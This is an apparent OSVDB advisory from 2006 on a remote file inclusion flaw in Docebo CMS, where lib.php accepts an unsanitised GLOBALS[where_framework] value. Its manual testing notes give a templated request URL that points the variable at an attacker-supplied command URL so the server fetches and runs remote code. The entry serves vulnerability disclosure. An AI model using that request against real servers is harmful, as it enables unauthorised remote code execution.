Docebo CMS lib.php GLOBALS[where_framework] Variable Remote File Inclusion

2006-06-09T22:35:33
ID OSVDB:26711
Type osvdb
Reporter Federico Fazzi(federico@autistici.org)
Modified 2006-06-09T22:35:33

Description

Vulnerability Description

docebocms contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to lib.php not properly sanitizing user input supplied to the GLOBALS[where_framework] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Docebo has released a patch to address this vulnerability.

Short Description

docebocms contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to lib.php not properly sanitizing user input supplied to the GLOBALS[where_framework] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[dc_path]/lib/lib.php?GLOBALS[where_framework]=[cmd_url]

References:

Vendor URL: http://www.docebolms.org/ Vendor Specific Solution URL: http://www.docebo.org/doceboCms/bugtracker/18_124/bugdetails/appid_1-bugid_145/bugtracker.html Related OSVDB ID: 26707 Related OSVDB ID: 26710 Related OSVDB ID: 26713 Related OSVDB ID: 26712 Related OSVDB ID: 26708 Related OSVDB ID: 26709 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0113.html